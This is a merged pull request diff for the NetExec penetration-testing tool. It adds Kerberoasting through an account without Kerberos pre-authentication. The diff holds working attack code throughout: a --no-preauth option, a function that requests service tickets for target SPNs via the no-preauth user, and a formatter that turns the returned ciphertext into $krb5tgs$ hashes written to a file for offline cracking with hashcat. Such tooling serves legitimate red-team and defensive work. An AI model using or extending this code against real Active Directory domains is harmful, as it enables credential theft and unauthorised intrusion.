Merge pull request Pennyw0rth#719 from azoxlpf/feat/kerberoast-no-preauth

Add Kerberoasting support with no-preauth user

Author: NeffIsBack

nxc/connection.py

@@ -136,7 +136,11 @@ def __init__(self, args, db, target):
         # Authentication info
         self.password = ""
         self.username = ""
-        self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey or (hasattr(self.args, "delegate") and self.args.delegate))
+        self.kerberos = bool(self.args.kerberos or
+                             self.args.use_kcache or
+                             self.args.aesKey or
+                             (hasattr(self.args, "delegate") and self.args.delegate) or
+                             (hasattr(self.args, "no_preauth") and self.args.no_preauth))
         self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
         self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
         self.admin_privs = False

nxc/protocols/ldap.py

@@ -347,7 +347,7 @@ def print_host_info(self):
         self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain}) ({signing}) ({cbt_status}) {ntlm}")
 
     def kerberos_login(self, domain, username, password="", ntlm_hash="", aesKey="", kdcHost="", useCache=False):
-        self.username = username if not self.username else self.username    # With ccache we get the username from the ticket
+        self.username = username if not self.args.use_kcache else self.username    # With ccache we get the username from the ticket
         self.password = password
         self.domain = domain
         self.kdcHost = kdcHost
@@ -413,7 +413,11 @@ def kerberos_login(self, domain, username, password="", ntlm_hash="", aesKey="",
                 f"{domain}\\{self.username}{' account vulnerable to asreproast attack'} {''}",
                 color="yellow",
             )
-            return False
+            # If no preauth is set, we want to be able to execute commands such as --kerberoasting
+            if self.args.no_preauth:  # noqa: SIM103
+                return True
+            else:
+                return False
         except SessionError as e:
             error, desc = e.getErrorString()
             used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
@@ -985,6 +989,46 @@ def asreproast(self):
                         hash_asreproast.write(f"{hash_TGT}\n")
 
     def kerberoasting(self):
+        if self.args.no_preauth:
+            usernames = []
+            for item in self.args.no_preauth:
+                if os.path.isfile(item):
+                    with open(item, encoding="utf-8") as f:
+                        usernames.extend(line.strip() for line in f if line.strip())
+                else:
+                    usernames.append(item.strip())
+
+            skipped = []
+            hashes = []
+
+            for spn in usernames:
+                base_name = spn.split("/", 1)[0].split("@", 1)[0].rstrip()
+
+                if base_name.lower() == "krbtgt" or base_name.endswith("$"):
+                    skipped.append(base_name)
+                    continue
+
+                if not self.username:
+                    self.logger.fail("Likely executed without password flag. Please run the command with -p ''")
+                    return
+                hashline = KerberosAttacks(self).get_tgs_no_preauth(self.username, spn)
+                if hashline:
+                    hashes.append(hashline)
+
+            if skipped:
+                self.logger.display(f"Skipping account: {', '.join(skipped)}")
+            if hashes:
+                self.logger.display(f"Total of records returned {len(hashes)}")
+            else:
+                self.logger.highlight("No entries found!")
+
+            for line in hashes:
+                self.logger.highlight(line)
+                if self.args.kerberoasting:
+                    with open(self.args.kerberoasting, "a+", encoding="utf-8") as f:
+                        f.write(line + "\n")
+            return
+
         # Building the search filter
         searchFilter = "(&(servicePrincipalName=*)(!(objectCategory=computer)))"
         attributes = [

nxc/protocols/ldap/kerberos.py

@@ -104,6 +104,37 @@ def output_tgs(self, tgs, old_session_key, session_key, username, spn, fd=None):
 
         return entry
 
+    def output_tgs_from_asrep(self, asrep_blob, spn, fd=None):
+        asrep = decoder.decode(asrep_blob, asn1Spec=AS_REP())[0]
+        realm = self.domain.upper()
+        enc = asrep["ticket"]["enc-part"]
+        etype = enc["etype"]
+        cipher = enc["cipher"].asOctets()
+
+        service = spn.split("/")[0]
+        spn_fmt = spn.replace(":", "~")
+
+        if etype == constants.EncryptionTypes.rc4_hmac.value:  # 23
+            chk = hexlify(cipher[:16]).decode()
+            data = hexlify(cipher[16:]).decode()
+            entry = f"$krb5tgs${etype}*{service}${realm}${spn_fmt}*${chk}${data}"
+
+        elif etype in (
+            constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value,  # 17
+            constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value,  # 18
+        ):
+            chk = hexlify(cipher[-12:]).decode()
+            data = hexlify(cipher[:-12]).decode()
+            entry = f"$krb5tgs${etype}${service}${realm}$*{spn_fmt}*${chk}${data}"
+
+        else:
+            self.logger.fail(f"[{spn}] etype {etype} not supported")
+            return None
+
+        if fd:
+            fd.write(entry + "\n")
+        return entry
+
     def get_tgt_kerberoasting(self, kcache=None):
         if kcache:
             if getenv("KRB5CCNAME"):
@@ -178,6 +209,28 @@ def get_tgt_kerberoasting(self, kcache=None):
         nxc_logger.debug(f"Final TGT: {tgt_data}")
         return tgt_data
 
+    def get_tgs_no_preauth(self, no_preauth_user, spn):
+        no_pre_princ = Principal(no_preauth_user,
+                                type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+
+        try:
+            ticket, _cipher, _old, _sess = getKerberosTGT(
+                clientName=no_pre_princ,
+                password="",
+                domain=self.domain,
+                lmhash=b"",
+                nthash=b"",
+                aesKey="",
+                kdcHost=self.kdcHost,
+                serverName=spn,
+                kerberoast_no_preauth=True
+            )
+        except Exception as e:
+            nxc_logger.debug(f"Unable to retrieve the ticket for {spn} via {no_preauth_user}: {e}")
+            return None
+
+        return self.output_tgs_from_asrep(ticket, spn)
+
     def get_tgt_asroast(self, userName, requestPAC=True):
         client_name = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 

nxc/protocols/ldap/proto_args.py

@@ -13,6 +13,7 @@ def proto_args(parser, parents):
     egroup = ldap_parser.add_argument_group("Retrieve hash on the remote DC", "Options to get hashes from Kerberos")
     egroup.add_argument("--asreproast", help="Output AS_REP response to crack with hashcat to file")
     egroup.add_argument("--kerberoasting", help="Output TGS ticket to crack with hashcat to file")
+    egroup.add_argument("--no-preauth", nargs=1, dest="no_preauth", help="No-preauth user for AS-REQ Kerberoast (use with -u users/SPNs).")
 
     vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain")
     vgroup.add_argument("--base-dn", metavar="BASE_DN", dest="base_dn", type=str, default=None, help="base DN for search queries")